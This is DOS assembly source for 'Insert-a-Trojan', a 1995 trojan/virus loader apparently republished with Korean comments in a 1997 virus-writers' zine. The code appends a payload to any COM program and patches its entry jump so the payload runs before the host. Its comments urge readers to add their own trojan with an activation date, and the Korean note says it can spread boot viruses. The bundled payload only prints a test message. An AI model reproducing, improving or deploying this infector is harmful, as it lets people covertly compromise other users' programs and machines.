;
; 트로이목마 집어 넣기                                           CVC 02  97/09
;
;--------------------------------------------------------------> 편집 : Osiris
;
; Insert-a-Trojan v1.0 by Nemesis
;
; Created 12-15-95 for Nemesis' Nifty Mag
;
; This will insert any trojan you create into any COM program without
; causing the program to become inoperative. (It's a goddman virus loader).
; I recommend putting an activation date on your trojan (or a run counter)
; and letting it do it's work.
;
; Originally I wrote an overwiting one is pascal which was quickly hacked
; by NWVA into something a "little" better. This too could be hacked to
; make it better by allowing for EXE trojans and options to encrypt the
; trojan. (both are simple additions)
;
; 현재 COM 파일만 지원한다. 이런 프로그램을 이용해서 부트 바이러스를 퍼뜨릴
; 수 있다. 향상된 버전을 제작해서 곧 공개 할 예정이다.
;

.model tiny
.code
 org 100h

start:
        mov     si,81h                  ; Command Line 위치

        mov     di,offset trjname       ;
        call    getparam                ; 파일 이름 구하기

        mov     ax,3D02h                ; 해당 파일 열기
        lea     dx,trjname
        int     21h

        xchg    ax,bx                   ; BX=파일 핸들

        mov     ah,3Fh                  ; 읽어 들이기
        lea     dx,oldbytes
        mov     cx,3
        int     21h

        mov     ax,4202h                ; 파일 끝으로 이동
        xor     cx,cx                   ; CX=0
        cwd                             ; DX=0
        int     21h

        sub     ax,3                    ;

        mov     space,byte ptr 0E9h     ; JMP 명령 넣기
        mov     word ptr space+1,ax     ; 주소


        mov     ah,40h                  ; 트로이목마 쓰기
        mov     dx,offset trojan
        mov     cx,offset end_trojan-offset start
        int     21h

        mov     ax,4200h                ; 처음으로 이동
        xor     cx,cx
        cwd
        int     21h                     ;


        mov     dx,offset space         ;
        mov     cx,3
        mov     ah,40h
        int     21h

        mov     ax,03Eh                 ; 파일 닫기
        int     21h
        int     20h                     ; 프로그램 끝내기

;
trojan:                                 ; 트로이목마
        call    realcode
realcode:
        pop     bp
        sub     bp,offset realcode

        lea     si,[bp+oldbytes]        ; 앞부분 복구 시키기
        mov     di,100h
        push    di
        movsw
        movsb

;
; Insert your trojan here. It's fun :) (and lame)
;

        mov     ah,09h
        lea     dx,[bp+message]
        int     21h

;
;

        ret

message  db 'Test Trojan!',0Dh,0Ah,'$'
oldbytes db 3 dup (0)



end_trojan:


getparam:                       ;

ks:
        lodsb                   ; SI->AL
        cmp     al,' '          ; 스페이스 ?
        jne     getname         ;
        loope   ks              ;

read_it:
        lodsb                   ;
getname:
        cmp     al,0Ah          ; 스트링의 끝 ?
        je      done_scan

        cmp     al,' '          ;
        jbe     done_scan
        stosb                   ; AL->DI

        loop    read_it

done_scan:
        ret

trjname db 76 dup(0)            ; File Name
space   db 3  dup(?)            ; Filler

end start
